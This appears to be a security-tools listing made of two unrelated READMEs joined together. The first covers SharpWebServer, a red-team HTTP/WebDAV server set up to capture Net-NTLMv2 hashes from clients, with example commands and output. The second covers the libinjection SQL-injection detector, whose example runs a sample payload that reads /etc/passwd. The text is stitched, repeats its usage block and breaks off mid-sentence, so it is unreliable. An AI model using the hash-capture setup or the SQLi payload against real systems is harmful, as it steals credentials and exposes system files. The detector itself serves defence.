- Dominic Chell (@domchell) from MDSec - Net-NTLMv2 hashes capture code borrowed from Farmer
- Mariusz B. / mgeeky, <mb [at] binary-offensive.com> - combined all building blocks together,
added connection keep-alive to NTLM Authentication

Usage:
SharpWebServer.exe <port=port> [dir=path] [verbose=true] [ntlm=true] [logfile=path]

Options:
port - TCP Port number on which to listen (1-65535)
dir - Directory with files to be hosted.
verbose - Turn verbose mode on.
seconds - Specifies how long should the server be running. Default: indefinitely
ntlm - Require NTLM Authentication before serving files. Useful to collect NetNTLMv2 hashes
(in MDSec's Farmer style)
logfile - Path to output logfile.

Example

Example use-case serving files and capturing Net-NTLM hashes at the same time:

Server:

C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true

:: SharpWebServer ::
a Red Team oriented C# Simple HTTP & WebDAV Server with Net-NTLM hashes capture functionality

Authors:
- Dominic Chell (@domchell) from MDSec - Net-NTLM hashes capture code borrowed from Farmer
- Mariusz B. / mgeeky, <mb [at] binary-offensive.com> - WebDAV implementation, NTLM Authentication keep-alive,
all the rest.

Usage:
SharpWebServer.exe <port=port> [dir=path] [verbose=true] [ntlm=true] [logfile=path]

Options:
port - TCP Port number on which to listen (1-65535)
dir - Directory with files to be hosted.
verbose - Turn verbose mode on.
seconds - Specifies how long should the server be running. Default: indefinitely
ntlm - Require NTLM Authentication before serving files. Useful to collect NetNTLM hashes
(in MDSec's Farmer style)
logfile - Path to output logfile.

Client:

C:\> curl -sD- http://localhost:8888/test.txt --ntlm --negotiate -u TestUser:TestPassword
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
WWW-Authenticate: NTLM
Date: Mon, 29 Mar 2021 15:55:14 GMT

HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
WWW-Authenticate: NTLM TlRMTVNTUAACAAAABgAGADgAAAAFAomiESIzRFVmd4gAAAAAAAAAAIAAgAA+AAAABQLODgAAAA9TAE0AQgACAAYAUwBNAEIAAQAWAFMATQBCAC0AVABPAE8ATABLAEkAVAAEABIAcwBtAGIALgBsAG8AYwBhAGwAAwAoAHMAZQByAHYAZQByADIAMAAwADMALgBzAG0AYgAuAGwAbwBjAGEAbAAFABIAcwBtAGIALgBsAG8AYwBhAGwAAAAAAA==
Date: Mon, 29 Mar 2021 15:55:14 GMT

HTTP/1.1 200 OK
Content-Length: 6
Content-Type: text/plain
Date: Mon, 29 Mar 2021 15:55:14 GMT

foobar

WebDAV client:

C:\> dir \\localhost@8888\test
Volume in drive \\localhost@8888\test has no label.
Volume Serial Number is 0000-0000

Directory of \\localhost@8888\test

30.03.2021 05:12 <DIR> .
30.03.2021 05:12 <DIR> ..
30.03.2021 04:27 11 test2.txt
30.03.2021 05:12 12 test3.txt
30.03.2021 05:12 <DIR> test4
2 File(s) 23 bytes
3 Dir(s) 225 268 776 960 bytes free

C:\> type \\localhost@8888\test\test4\test5.txt
Hello world!

C:\> copy \\localhost@8888\test\test4\test5.txt .
1 file(s) copied.

Authors
  • NTLM hashes capture code & TCP Listener backbone borrowed from the MDSec ActiveBreach Farmer project written by Dominic Chell (@domchell).

  • WebDAV implementation, NTLM Authentication keep-alive logic & all the rest - Mariusz B. / mgeeky, '21, <mb [at] binary-offensive.com>



Libinjection - SQL / SQLI Tokenizer Parser Analyzer



SQL / SQLI tokenizer parser analyzer. For

See https://www.client9.com/ for details and presentations.


Simple example:

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include "libinjection.h"
#include "libinjection_sqli.h"

int main(int argc, const char* argv[])
{
    struct libinjection_sqli_state state;
    int issqli;

    const char* input = argv[1];
    size_t slen = strlen(input);

    /* in the real world, you would url-decode the input, etc. */

    libinjection_sqli_init(&state, input, slen, FLAG_NONE);
    issqli = libinjection_is_sqli(&state);
    if (issqli) {
        fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint);
    }
    return issqli;
}
$ gcc -Wall -Wextra examples.c libinjection_sqli.c
$ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
sqli detected with fingerprint of 's&1UE'

More advanced samples:


VERSION INFORMATION

See CHANGELOG for details.

Versions are listed as "major.minor.point"

Major are significant changes to the API and/or fingerprint format. Applications will need recompiling and/or refactoring.

Minor are C code changes. These may include

  • logical change to detect or suppress
  • optimization changes
  • code refactoring

Point releases are purely data changes. These may be safely applied.


QUALITY AND DIAGNOSTICS

The continuous integration at https://travis-ci.org/client9/libinjection tests the following:


EMBEDDING

The src directory contains everything, but you only need to copy the following into your source tree:


